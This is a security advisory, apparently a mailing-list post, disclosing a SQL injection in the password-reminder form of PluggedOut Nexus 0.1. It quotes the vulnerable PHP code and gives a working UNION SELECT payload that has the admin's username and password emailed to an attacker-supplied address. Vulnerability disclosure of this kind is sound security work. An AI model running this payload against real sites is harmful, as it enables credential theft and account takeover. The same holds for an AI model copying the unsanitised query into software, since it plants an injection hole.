PluggedOut Nexus SQL injection Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums. Project : PluggedOut Nexus Version : 0.1 Author : Jonathan Beckett Home : http://www.pluggedout.com Credit: The information has been provided by Hamid Ebadi . ( Hamid Network Security Team): admin[AT]hamid[o]ir The original article can be found at: http://hamid.ir/security/ Vulnerable Systems:PluggedOut Nexus 0.1 http://localhost/Nexus/forgotten_password.php in this address If you fill the private email address that you used while creating your account into the form , the server will send you an email to that address with your login details Input passed to the "email" parameter in "forgotten_password.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. test: in E-Mail Address form enter ' and press Send Request you will redirect to http://localhost/Nexus/site_problem.php and see : Problem with Nexus website A problem has occurred with the Nexus website - this was not your fault, and the administrators probably already know about it. Vulnerable Code: The following lines in "forgotten_password.php" : ---------------------------~=[Vulnerable Code]=~--------------------------- if ($_POST["submit"]!=""){ $con = db_connect(); $sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users WHERE cEMailPrivate='".$_POST["email"]."'"; $result = mysql_query($sql,$con); if ($result!=false){ if (mysql_num_rows($result)>0){ $row = mysql_fetch_array($result); $from = $site_admin_email; $to = $row["cEMailPrivate"]; $subject = "Reminder Username/Password from ".$site_long_name.""; $body = "This email has been sent following a request for a reminder username/password in the ".$site_long_name." website.\n\n" ."Your account details are as follows;\n" ." Username : ".$row["cUsername"]."\n" ." Password : ".$row["cPassword"]."\n\n" ."If you did not request this reminder message, please contact the ".$site_long_name." administrator (".$admin_email.")\n"; send_email($from,$to,$subject,$body); ---------------------------~=[/Vulnerable Code]=~--------------------------- exploit: insert this code in E-Mail Address form (http://localhost/Nexus/forgotten_password.php) : hamidnetworksecurityteam' union select cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from nexus_users WHERE nUserId=1 and '1'='1 and ATTACKER@EMAIL.ADDRESS recieve email contain username & password for userID=1 . Signature __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com